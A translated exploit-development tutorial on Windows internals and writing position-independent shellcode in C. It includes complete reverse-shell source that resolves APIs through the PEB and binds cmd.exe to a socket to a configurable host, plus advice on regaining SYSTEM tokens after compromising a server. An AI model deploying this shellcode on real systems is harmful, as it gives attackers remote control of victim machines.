
Exploit Development Series Tutorial: Windows Basics & Shellcode | WooYun Knowledge Base



from:http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

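Windows Basics


0x00 Windows Basics

This article briefly covers some things that every Windows developer should already know.

0x01 Win32 API

The main Windows API is provided by several DLLs (Dynamic Link Libraries). An application can import functions from those DLLs and call them. This keeps ordinary user-mode applications portable.

0x02 PE File Format

Executables and DLLs are PE (Portable Executable) files. Each PE file has an import table and an export table. The import table lists the functions to import and the files (modules) that contain them. The export table lists the exported functions, which other PE files can then import.

A PE file is made up of several sections (code, data, etc.). The .reloc section contains the information needed to relocate the executable or DLL in memory. Some addresses in the code are relative (as in relative jmps), but many are absolute and therefore depend on the address at which the module is loaded.

The Windows loader searches for DLLs starting with the directory the application was loaded from. This means an application can ship with a DLL that differs from the one in the system directory (\windows\system32). Some people call the resulting versioning problem DLL-hell.

It's important to understand the concept of Relative Virtual Address (RVA). PE files use RVAs to specify where elements are located relative to the base address of the module. In other words, suppose a module is loaded at address B (the base address) and an element has an RVA of X within that module. Then the element's VA (Virtual Address) is B+X.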
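The RVA arithmetic fits in a few lines of Python 3. The helper names below are hypothetical. Addresses are masked to 32 bits because this article deals with 32-bit processes:

```python
MASK32 = 0xFFFFFFFF  # 32-bit address space

def rva_to_va(base, rva):
    """VA = B + X, where B is the module's load address and X is the RVA."""
    return (base + rva) & MASK32

def va_to_rva(base, va):
    """Inverse mapping: the offset of a VA from the module's base address."""
    return (va - base) & MASK32

# The same RVA maps to different VAs depending on where the module is loaded.
print(hex(rva_to_va(0x400000, 0x100)))    # 0x400100
print(hex(rva_to_va(0x10000000, 0x100)))  # 0x10000100
```

This is why a PE file can describe where its own data lives without knowing in advance where it will be loaded.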

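0x03 Threads

If you have been using Windows for a while, you should already be very familiar with threads. If you come from Linux, however, keep in mind that Windows schedules threads, not processes: CPU time is given to threads. You create new processes with CreateProcess() and new threads with CreateThread(). Threads execute in the address space of the process they belong to, so they share its memory.

Threads can also have some non-shared memory through a mechanism called TLS (Thread Local Storage).

Basically, the TEB of each thread contains a main TLS array of 64 DWORDs. If the slots of the main array run out, an additional TLS array of 1024 DWORDs is allocated. Before a slot can be used, an index corresponding to a position in one of the two arrays must be allocated (reserved) with TlsAlloc(), which returns that index. Each thread can then read the DWORD at that index in its own arrays with TlsGetValue(index) and write it with TlsSetValue(index, newValue). For example, TlsGetValue(7) reads the DWORD at index 7 of the main TLS array in the current thread's TEB.

Note: we could emulate this mechanism with GetCurrentThreadId(), but it wouldn't be as efficient.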
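The note above can be made concrete with a minimal Python 3 sketch of that emulation. It uses a dictionary keyed by (thread id, index), with threading.get_ident() standing in for GetCurrentThreadId(). The names tls_alloc, tls_get_value and tls_set_value are hypothetical and only mirror the Win32 functions. Unlike real TLS, every access goes through a shared, locked dictionary, which is exactly why this approach is less efficient than reading a slot in the thread's own TEB:

```python
import threading

_lock = threading.Lock()
_next_index = 0
_slots = {}  # (thread id, index) -> value

def tls_alloc():
    """Reserve a new index, like TlsAlloc()."""
    global _next_index
    with _lock:
        index = _next_index
        _next_index += 1
        return index

def tls_set_value(index, value):
    """Store value in the calling thread's slot, like TlsSetValue()."""
    with _lock:
        _slots[(threading.get_ident(), index)] = value

def tls_get_value(index):
    """Read the calling thread's slot; a slot never written reads as 0."""
    with _lock:
        return _slots.get((threading.get_ident(), index), 0)

# Two threads write different values at the same index; each reads back its own.
index = tls_alloc()
seen = {}

def worker(n):
    tls_set_value(index, n)
    seen[n] = tls_get_value(index)

threads = [threading.Thread(target=worker, args=(n,)) for n in (1, 2)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(sorted(seen.items()), tls_get_value(index))  # [(1, 1), (2, 2)] 0
```

Python may reuse a thread id after the thread exits. A more complete emulation would therefore also have to clear a thread's slots when it terminates.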

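0x04 Tokens

Tokens are commonly used to describe access rights. Like a file handle, a token is just a 32-bit integer. It is associated with an internal structure of the process that holds the information about the access rights.

There are two types of tokens: primary tokens and impersonation tokens. Whenever a process is created, it is assigned a primary token. Each thread of the process can use the token of the process, or an impersonation token obtained from another process. LogonUser() can also return an impersonation token for the given credentials (for example, with the LOGON32_LOGON_NETWORK logon type). Such a token can't be used with CreateProcessAsUser() unless you first convert it into a primary token with DuplicateTokenEx().

You can attach a token to the current thread with SetThreadToken(newToken) and remove it with RevertToSelf(), which reverts the thread to the primary token.

Consider a user who connects to a server running on Windows and sends a username and password. The server runs as SYSTEM and calls LogonUser() with the credentials; if the call succeeds, it gets back a new token. The server then creates a new thread, which calls SetThreadToken(new_token), where new_token is the token returned by LogonUser(). This way, the thread runs with the same privileges as the user. When the thread has finished serving the client, it is either destroyed or calls RevertToSelf() and is added to a pool of idle threads.

If you take control of the server, you can restore the thread's original privileges (i.e. SYSTEM) by calling RevertToSelf(). Alternatively, you can look for other tokens in memory and attach them to the current thread with SetThreadToken().

Keep in mind that CreateProcess() uses the primary token as the token of the new process. This is a problem when CreateProcess() is called by a thread whose impersonation token has more privileges than the primary token: the new process ends up with fewer privileges than the thread that created it.

The solution is to create a new primary token from the current thread's impersonation token with DuplicateTokenEx(). The new process is then created by calling CreateProcessAsUser() with that primary token.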

shellcode


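0x00 Introduction

Shellcode is a piece of code that an exploit sends as its payload. It is injected into the vulnerable application and executed there. Shellcode must be self-contained and should not contain null bytes. It is often copied with functions like strcpy(), which stop copying when they hit a null byte, so a shellcode containing nulls wouldn't be copied completely. Shellcode is usually written directly in assembly, but in this article we'll develop it in C/C++ with Visual Studio 2013. Developing in this environment has the following advantages:

1. Much shorter development time.

2. IntelliSense.

3. Easier debugging.

We'll use VS2013 to produce an executable containing our shellcode. We'll then use a Python script to extract the shellcode and fix it (remove its null bytes).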
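To see why null bytes matter, here is a small Python 3 model of a strcpy()-style copy. strcpy_like is a hypothetical helper, not a real API. It is applied to the bytes of mov dword ptr ds:[8E9130h],0Ch, an instruction shown later in this article:

```python
def strcpy_like(src):
    """Copy bytes up to and including the first null byte, as strcpy() does.

    If there is no terminator, this model simply copies everything.
    """
    end = src.find(b'\0')
    return src if end == -1 else src[:end + 1]

code = bytes.fromhex('C7 05 30 91 8E 00 0C 00 00 00')  # a 10-byte instruction
copied = strcpy_like(code)
print(len(code), len(copied))  # 10 6
```

Only the first 6 bytes survive the copy, and the instruction is cut in half.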

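0x01 C/C++ Code

Use stack variables only

To write position independent code, we must use stack variables. This means we can't write

char *v = new char[100];

because that array would be allocated on the heap. The code would call the new operator from msvcr120.dll through an absolute address: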

00191000 6A 64                push        64h
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]

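The address 192090h holds the address of the function. If we want to call a function from a library, we must do it directly, without relying on the import table and the Windows loader. Another problem is that the new operator probably requires some initialization performed by the C/C++ runtime.

We can't use global variables either: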

int x;
 
int main() {
  x = 12;
}

The code above (if not optimized away) produces

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch

8E9130h is the absolute address of the variable x.
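This mov and the earlier call dword ptr ds:[192090h] share the same 32-bit x86 encoding: the ModRM byte selects an absolute [disp32] operand (mod = 00, r/m = 101). The address is therefore stored verbatim, little-endian, right after the ModRM byte. The minimal Python 3 sketch below recovers it. absolute_disp32 is a hypothetical helper, and it assumes a one-byte opcode with no prefixes:

```python
import struct

def absolute_disp32(code):
    """Return the absolute address in an instruction whose ModRM selects [disp32].

    Assumes 32-bit code, a one-byte opcode and no prefixes (e.g. C7 05 ..., FF 15 ...).
    """
    modrm = code[1]
    if (modrm & 0xC7) != 0x05:  # mod must be 00 and r/m must be 101
        raise ValueError('operand is not an absolute [disp32]')
    return struct.unpack_from('<I', code, 2)[0]

print(hex(absolute_disp32(bytes.fromhex('C7 05 30 91 8E 00 0C 00 00 00'))))  # 0x8e9130
print(hex(absolute_disp32(bytes.fromhex('FF 15 90 20 19 00'))))              # 0x192090
```

When the module is loaded at a different base, these four bytes are what the loader must patch using the .reloc section. That is why shellcode can't rely on such operands.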

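Strings are a problem too. If we write

char str[] = "I'm a string";

printf(str);

the string is put into the .rdata section of the executable and referenced through an absolute address.

You must not use printf in shellcode: this is just an example to show how str is referenced.

Here's the asm code: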

00A71006 8D 45 F0             lea         eax,[str]
00A71009 56                   push        esi
00A7100A 57                   push        edi
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
00A71010 8D 7D F0             lea         edi,[str]
00A71013 50                   push        eax
00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]

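As you can see, the string is located in the .rdata section at address A72100h. The movsd and movsb instructions copy it onto the stack (str points to the stack). Note that A72100h is an absolute address, so this code is clearly not position independent.

If we write this instead: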

char *str = "I'm a string";
printf(str);

then the string is still put into the .rdata section, but it isn't copied onto the stack:

00A31000 68 00 21 A3 00       push        0A32100h
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]

The string is in .rdata at the absolute address A32100h.

How can we make this code position independent?

A simpler (partial) solution:

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

The corresponding assembly code:

012E1006 8D 45 F0             lea         eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
012E1010 50                   push        eax
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]

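Apart from the call to printf, this code is position independent, because the pieces of the string are encoded directly in the source operands of the mov instructions. Once the string has been built on the stack, it can be used.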
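The constants in those mov instructions are just the string's bytes read as little-endian integers. The rough Python 3 sketch below splits a null-terminated string into dword, word and byte immediates. The function name is hypothetical, and the sketch ignores the compiler's choice of SSE moves for longer strings. It reproduces the constants in the listing above:

```python
import struct

def stack_string_immediates(text):
    """Split text plus its terminating null into (size, value) mov immediates."""
    data = text.encode('ascii') + b'\0'
    chunks = []
    pos = 0
    for size, fmt in ((4, '<I'), (2, '<H'), (1, '<B')):
        while len(data) - pos >= size:
            chunks.append((size, struct.unpack_from(fmt, data, pos)[0]))
            pos += size
    return chunks

for size, value in stack_string_immediates("I'm a string"):
    print(size, hex(value))
# 4 0x206d2749
# 4 0x74732061
# 4 0x676e6972
# 1 0x0
```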

Unfortunately, this approach stops working once the string gets long enough. The code

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

generates

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8             lea         eax,[str]
013E1011 50                   push        eax
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]

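As you can see, part of the string is placed in the .rdata section at address 13E2100h. The rest is encoded in the source operands of mov instructions, as before.

The solution I came up with is to write

char *str = "I'm a very long string";

and to fix the shellcode with a Python script. The script extracts the referenced strings from the .rdata section, puts them into the shellcode and fixes the relocations. We'll see how soon.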
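The fix-up itself can be modeled in a few lines. In the script's add_loader_to_shellcode(), shown later, each relocated pointer is rewritten as an offset from a label. A small stub obtains the label's runtime address with CALL/POP and adds it to each of those dwords. The Python 3 sketch below models only that addition step. apply_relocations is a hypothetical name, and the 0x401000 label address is an arbitrary example:

```python
import struct

def apply_relocations(code, relocs, label_address):
    """Add label_address to each little-endian dword at the offsets in relocs.

    Each dword initially holds an offset relative to the label, so after the
    addition it holds an absolute address (wrapping at 32 bits, like ADD on x86).
    """
    buf = bytearray(code)
    for off in relocs:
        value = struct.unpack_from('<I', buf, off)[0]
        struct.pack_into('<I', buf, off, (value + label_address) & 0xFFFFFFFF)
    return bytes(buf)

# push <offset 10h from the label>, relocated for a label at 0x401000
code = bytes.fromhex('68 10 00 00 00')
print(apply_relocations(code, [1], 0x401000).hex())  # 6810104000
```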

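Don't call Windows API functions directly

In C/C++ code, we can't write

WaitForSingleObject(procInfo.hProcess, INFINITE);

because WaitForSingleObject is imported from kernel32.dll.

In a nutshell, a PE file contains an import table and an import address table (IAT). The import table contains information about the functions imported from libraries. When the executable is loaded, the Windows loader fills in the IAT with the addresses of the imported functions. The code of the executable then calls the imported functions through one level of indirection. For example: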

 001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]

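The address 1D2094h is the location of the IAT entry that contains the address of the function MessageBoxA. This indirection is useful because the calls themselves don't need to be fixed (unless the executable is relocated). The only thing the Windows loader needs to fix is the dword at 1D2094h, which holds the address of MessageBoxA.

The solution is to get the addresses of the Windows functions directly from Windows' own data structures. We'll see how later.

Creating a new project

Go to File→New→Project…, select Installed→Templates→Visual C++→Win32→Win32 Console Application, choose a name for the project (I chose shellcode) and click OK.

Go to Project→<project name> properties, and a new dialog will appear. To apply the changes to all configurations (Release and Debug), set Configuration (top left of the dialog) to All Configurations. Then expand Configuration Properties and, under General, set Platform Toolset to Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013).

This way you'll be able to use some features of C++11 and C++14, such as static_assert.

Shellcode example

Here's the code of a simple reverse shell. Add a file named shellcode.cpp to the project and copy this code into it. Don't try to understand all the code right now; we'll discuss it in detail later.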

// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
// NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".
 
#include <WinSock2.h>               // must precede #include <windows.h>
#include <WS2tcpip.h>
#include <windows.h>
#include <winnt.h>
#include <winternl.h>
#include <stddef.h>
#include <stdio.h>
 
#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))
 
_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}
 
DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}
 
DWORD getFunctionHash(const char *moduleName, const char *functionName) {
    return getHash(moduleName) + getHash(functionName);
}
 
LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
    int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset);
}
 
// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
//       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
 
        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);
 
        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
    } while (ptr != first);
 
    return NULL;            // address not found
}
 
#define HASH_LoadLibraryA           0xf8b7108d
#define HASH_WSAStartup             0x2ddcd540
#define HASH_WSACleanup             0x0b9d13bc
#define HASH_WSASocketA             0x9fd4f16f
#define HASH_WSAConnect             0xa50da182
#define HASH_CreateProcessA         0x231cbe70
#define HASH_inet_ntoa              0x1b73fed1
#define HASH_inet_addr              0x011bfae2
#define HASH_getaddrinfo            0xdc2953c9
#define HASH_getnameinfo            0x5c1c856e
#define HASH_ExitThread             0x4b3153e0
#define HASH_WaitForSingleObject    0xca8e9498
 
#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
int entryPoint() {
//  printf("0x%08x\n", getFunctionHash("kernel32.dll", "WaitForSingleObject"));
//  return 0;
 
    // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
    //       they're not strictly needed.
 
    DefineFuncPtr(LoadLibraryA);
 
    My_LoadLibraryA("ws2_32.dll");
 
    DefineFuncPtr(WSAStartup);
    DefineFuncPtr(WSASocketA);
    DefineFuncPtr(WSAConnect);
    DefineFuncPtr(CreateProcessA);
    DefineFuncPtr(inet_ntoa);
    DefineFuncPtr(inet_addr);
    DefineFuncPtr(getaddrinfo);
    DefineFuncPtr(getnameinfo);
    DefineFuncPtr(ExitThread);
    DefineFuncPtr(WaitForSingleObject);
 
    const char *hostName = "127.0.0.1";
    const int hostPort = 123;
 
    WSADATA wsaData;
 
    if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))
        goto __end;         // error
    SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
        goto __end;
 
    addrinfo *result;
    if (My_getaddrinfo(hostName, NULL, NULL, &result))
        goto __end;
    char ip_addr[16];
    My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);
 
    SOCKADDR_IN remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(hostPort);
    remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);
 
    if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
        goto __end;
 
    STARTUPINFOA sInfo;
    PROCESS_INFORMATION procInfo;
    SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = STARTF_USESTDHANDLES;
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
    My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);
 
    // Waits for the process to finish.
    My_WaitForSingleObject(procInfo.hProcess, INFINITE);
 
__end:
    My_ExitThread(0);
 
    return 0;
}
 
int main() {
    return entryPoint();
}

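Compiler configuration

Go to Project→<project name> properties, expand Configuration Properties and select C/C++. Apply the changes to the Release configuration.

Here are the settings to change:

  • General:

    • SDL Checks: No (/sdl-)

This is probably not necessary, but I turned them off anyway.

  • Optimization:

    • Optimization: Minimize Size (/O1)

This is very important! We want the shellcode to be as small as possible.

    • Inline Function Expansion: Only __inline (/Ob1)

This setting tells VS 2013 to inline only the functions declared with _inline. main() only calls entryPoint, the shellcode's function. If entryPoint were short, it could get inlined into main(). That would be really bad, because main() would no longer mark the end of the shellcode (in fact, it would contain part of it). We'll see why this matters later.

    • Enable Intrinsic Functions: Yes (/Oi)

I don't know whether this setting should be turned off.

    • Favor Size Or Speed: Favor small code (/Os)

    • Whole Program Optimization: Yes (/GL)

  • Code Generation:

    • Security Check: Disable Security Check (/GS-)

We don't need security checks!

    • Enable Function-Level linking: Yes (/Gy)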

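Linker configuration

Go to Project→<project name> properties, expand Configuration Properties and select Linker. Apply the changes to the Release configuration. Here are the settings you need to change:

  • General:

    • Enable Incremental Linking: No (/INCREMENTAL:NO)

  • Debugging:

    • Generate Map File: Yes (/MAP)

This tells the linker to generate a map file describing the structure of the EXE.

    • Map File Name: mapfile

This is the name of the map file. Choose whatever name you like.

  • Optimization:

    • References: Yes (/OPT:REF)

This is very important for keeping the shellcode small, because it removes functions and data that the code never references.

    • Enable COMDAT Folding: Yes (/OPT:ICF)

    • Function Order: function_order.txt

This setting makes the linker read a file named function_order.txt, which specifies the order in which functions must appear in the code section. We want entryPoint to be the first function in the code section, so function_order.txt must contain a line with the string ?entryPoint@@YAHXZ (the decorated name of entryPoint). You can find function names in the map file.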

getProcAddrByHash

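This function returns the address of a function exported by a module (.exe or .dll) present in memory, given the hash associated with the module and the function. Looking functions up by name would certainly be possible, but it would waste a lot of space because the names would have to be included in the shellcode. A hash, on the other hand, is only 4 bytes. Since we don't use two hashes (one for the module and one for the function), getProcAddrByHash has to consider all the modules loaded in memory.

The hash for MessageBoxA, exported by user32.dll, is computed as follows:

DWORD hash = getFunctionHash("user32.dll", "MessageBoxA");

The resulting hash is the sum of getHash("user32.dll") and getHash("MessageBoxA"). Because this is DWORD arithmetic, the sum is taken modulo 2^32. The implementation of getHash is straightforward: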

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}
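The commented-out printf at the start of entryPoint exists to compute HASH_ constants. The same can be done offline with the Python 3 port of getHash and getFunctionHash below. It is a sketch that assumes ASCII names, and the additions are masked to 32 bits to match DWORD arithmetic:

```python
MASK32 = 0xFFFFFFFF

def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    return ((value >> count) | (value << (32 - count))) & MASK32

def get_hash(name):
    """Port of getHash(): ROR 13, then add the uppercased character."""
    h = 0
    for ch in name.encode('ascii'):
        h = ror32(h, 13)
        h = (h + (ch - 32 if ch >= ord('a') else ch)) & MASK32
    return h

def get_function_hash(module_name, function_name):
    """Port of getFunctionHash(): the sum of the two hashes modulo 2**32."""
    return (get_hash(module_name) + get_hash(function_name)) & MASK32

print(hex(get_function_hash('user32.dll', 'MessageBoxA')))
```

Characters are uppercased before being added, so get_hash('user32.dll') equals get_hash('USER32.DLL').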

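As you can see, the hash is case-insensitive. This matters because in some versions of Windows the strings in memory are all uppercase. First, getProcAddrByHash gets the address of the PEB (Process Environment Block), which it reaches through the TEB (Thread Environment Block):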

PEB *peb = getPEB();

where

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

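The fs selector is associated with a segment that begins at the address of the TEB. At offset 30h, the TEB contains a pointer to the PEB (Process Environment Block). We can see this in WinDbg: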

0:000> dt _TEB @$teb
ntdll!_TEB
+0x000 NtTib            : _NT_TIB
+0x01c EnvironmentPointer : (null)
+0x020 ClientId         : _CLIENT_ID
+0x028 ActiveRpcHandle  : (null)
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
+0x034 LastErrorValue   : 0
+0x038 CountOfOwnedCriticalSections : 0
+0x03c CsrClientThread  : (null)
<snip>

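The PEB is associated with the current process. Among other things, it contains information about the modules loaded into the process address space. Here's getProcAddrByHash again: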

PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
        .
        .
        .
    } while (ptr != first);
 
    return NULL;            // address not found
}
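One detail of this loop is easy to miss. InMemoryOrderModuleList is circular and its head lives inside PEB_LDR_DATA, so the do/while loop also visits the head and treats it as if it were a LDR_DATA_TABLE_ENTRY. The dumps below show a 32-bit layout with InMemoryOrderLinks at +8 and DllBase at +18h. With that layout, the fake entry's "DllBase" falls on PEB_LDR_DATA.EntryInProgress (+24h), which is null in the dump. That is presumably what the !baseAddress check filters out. The Python 3 model below simulates memory as a dictionary of dwords, and all the addresses in it are made up:

```python
IN_MEMORY_ORDER_LINKS = 0x08  # offset of LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks
DLL_BASE = 0x18               # offset of LDR_DATA_TABLE_ENTRY.DllBase

def walk_modules(memory, first):
    """Mimic getProcAddrByHash's do/while loop and return the DllBase values it reads.

    memory maps an address to the dword stored there; unmapped addresses read as 0.
    """
    bases = []
    ptr = first
    while True:
        entry = ptr - IN_MEMORY_ORDER_LINKS        # getDataTableEntry(ptr)
        ptr = memory.get(ptr, 0)                   # ptr = ptr->Flink
        bases.append(memory.get(entry + DLL_BASE, 0))
        if ptr == first:                           # while (ptr != first)
            break
    return bases

# Made-up layout: PEB_LDR_DATA at 0x1000 (list head at +0x14) and two modules.
ldr = 0x1000
head = ldr + 0x14
memory = {
    head: 0x2008,             # head.Flink -> module A's InMemoryOrderLinks
    0x2008: 0x3008,           # A.Flink -> module B
    0x3008: head,             # B.Flink -> back to the head
    0x2000 + DLL_BASE: 0x00060000,
    0x3000 + DLL_BASE: 0x77000000,
}
print([hex(b) for b in walk_modules(memory, memory[head])])
# ['0x60000', '0x77000000', '0x0']
```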

Here's part of the PEB:

0:000> dt _PEB @$peb
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0x8 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00060000 Void
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null)
   +0x018 ProcessHeap      : 0x00680000 Void
   <snip>

At offset 0Ch there's a field called Ldr, which is a pointer to a PEB_LDR_DATA structure. Let's look at it in WinDbg:

0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null)
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
   +0x024 EntryInProgress  : (null)
   +0x028 ShutdownInProgress : 0 ''
   +0x02c ShutdownThreadId : (null)

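InMemoryOrderModuleList is a doubly linked list of LDR_DATA_TABLE_ENTRY structures, one for each module loaded in the current process's address space. To be precise, InMemoryOrderModuleList is a LIST_ENTRY, which contains two fields: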

0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
+0x000 Flink            : Ptr32 _LIST_ENTRY
+0x004 Blink            : Ptr32 _LIST_ENTRY

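Flink is the forward link and Blink the backward link. Flink points to the LDR_DATA_TABLE_ENTRY of the first module. Well, not exactly:

Flink points to a LIST_ENTRY structure contained in the LDR_DATA_TABLE_ENTRY structure.

Let's see how LDR_DATA_TABLE_ENTRY is defined: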

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY
+0x008 InMemoryOrderLinks : _LIST_ENTRY
+0x010 InInitializationOrderLinks : _LIST_ENTRY
+0x018 DllBase          : Ptr32 Void
+0x01c EntryPoint       : Ptr32 Void
+0x020 SizeOfImage      : Uint4B
+0x024 FullDllName      : _UNICODE_STRING
+0x02c BaseDllName      : _UNICODE_STRING
+0x034 Flags            : Uint4B
+0x038 LoadCount        : Uint2B
+0x03a TlsIndex         : Uint2B
+0x03c HashLinks        : _LIST_ENTRY
+0x03c SectionPointer   : Ptr32 Void
+0x040 CheckSum         : Uint4B
+0x044 TimeDateStamp    : Uint4B
+0x044 LoadedImports    : Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
+0x04c PatchInformation : Ptr32 Void
+0x050 ForwarderLinks   : _LIST_ENTRY
+0x058 ServiceTagLinks  : _LIST_ENTRY
+0x060 StaticLinks      : _LIST_ENTRY
+0x068 ContextInformation : Ptr32 Void
+0x06c OriginalBase     : Uint4B
+0x070 LoadTime         : _LARGE_INTEGER

InMemoryOrderModuleList.Flink points to _LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks, which is at offset 8. We must therefore subtract 8 to get the address of the _LDR_DATA_TABLE_ENTRY.
